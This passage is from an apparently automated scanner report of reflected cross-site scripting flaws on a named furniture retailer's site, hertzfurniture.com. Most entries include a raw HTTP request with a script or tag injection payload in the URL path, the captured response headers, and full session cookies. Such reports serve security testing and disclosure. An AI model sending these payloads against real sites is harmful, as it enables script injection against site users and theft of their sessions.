This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.htmla04b9<a>959a651c2ad HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/45-years.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12050
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ad6"><script>alert(1)</script>907c9515330 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.htmla9ad6"><script>alert(1)</script>907c9515330 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/45-years.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.12.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:24 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12098
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72f0a<a>7a179e9882c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Library-Furniture--20--no.html72f0a<a>7a179e9882c HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/search.php?find-box=xss%20circle%20shoes Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=55d4a97e1e7b407da97f4782754d124e; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.31.9.1317385225447; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:09:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384ae0e1f563e5ffdce; path=/ Vary: User-Agent Content-Length: 11972
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8021"><script>alert(1)</script>2b9f91d37bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Library-Furniture--20--no.htmle8021"><script>alert(1)</script>2b9f91d37bc HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/search.php?find-box=xss%20circle%20shoes Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=55d4a97e1e7b407da97f4782754d124e; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.31.9.1317385225447; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:09:55 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384ae0e1f563e5ffdce; path=/ Vary: User-Agent Content-Length: 12020
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d350"><script>alert(1)</script>78772bb2137 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Outdoor-Directories--38--ca.html2d350"><script>alert(1)</script>78772bb2137 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/church-furniture.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.16.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:39 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12024
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 31dc5<a>67661c6aa7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Outdoor-Directories--38--ca.html31dc5<a>67661c6aa7b HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/church-furniture.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; WRUID=410325474.977200202; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.16.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:36:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11976
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43c6e"><script>alert(1)</script>0e4dca14678 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html43c6e"><script>alert(1)</script>0e4dca14678 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.18.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:36:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21f87<a>785f12cdc0b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /Outdoor-Directories--Single-Sided-Alum-Outdoor-Readerboard---Colored--5636--mo.html21f87<a>785f12cdc0b HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Outdoor-Directories--38--ca.html Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; kmCheck=f3bdb4878e1749588aef3d1c1087f699; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.18.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:36:14 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 12078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eebbf<a>140c6ba9346 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cart.phpeebbf<a>140c6ba9346 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:16 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11928
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2e05"><script>alert(1)</script>0b53e75a9c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.phpe2e05"><script>alert(1)</script>0b53e75a9c8 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:15 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11976
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
3.379. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.hertzfurniture.com
Path:
/cart.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7b3c"><script>alert(1)</script>7b1f51b6164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.php/a7b3c"><script>alert(1)</script>7b1f51b6164 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:35:35 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/ Vary: User-Agent Content-Length: 13695
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
3.380. http://www.hertzfurniture.com/cart.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.hertzfurniture.com
Path:
/cart.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f9226<a>6734d7358b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /cart.php/f9226<a>6734d7358b7 HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://www.hertzfurniture.com/Library-Chairs--Educational-Edge-Wood-Chair-in-Natural--3759--mo.html?wfvar=d Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.14.9.1317384846493; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=0e3162c350804bc1b5f8f35069f28142; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:04:52 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855%2527%2527; path=/ Vary: User-Agent Content-Length: 13647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 471bc"><script>alert(1)</script>422ffc091eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cart.php471bc"><script>alert(1)</script>422ffc091eb/1' HTTP/1.1 Host: www.hertzfurniture.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: IPE35522=IPE35522; __utmx=1.00015598742331623501:2:3; __utmxx=1.00015598742331623501:1317384855:2592000; HER001-FE2_var=d; cartId=31f312284fec0a02f7a8e5e805e7d277; SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil855; __utma=1.1833889000.1317384676.1317384676.1317384676.1; __utmb=1.20.9.1317384906131; __utmc=1; __utmz=1.1317384676.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=1.|1=Visitor=1833889000=1; kmCheck=e2cab9cacd26447c8458e2fa0b603377; kmS6633=8724330e5e1e4e0c9955f42eddb6ccbb; kmE6633=1:0|15247,; kmL6633=1|0|Campaign not provided|AdGroup not provided|Raw Query not available|unk|burp|Raw Query not available; WRUID=410325474.977200202
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.53 Date: Fri, 30 Sep 2011 12:05:13 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="NOI NID ADMa OUR IND UNI COM NAV" Cache-Control: private, must-revalidate Set-Cookie: SN49ef2d0a88e46=t4ljur1050ha4n9j2s5tpil85578345384e53155c88b649bd6; path=/ Vary: User-Agent Content-Length: 11982
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
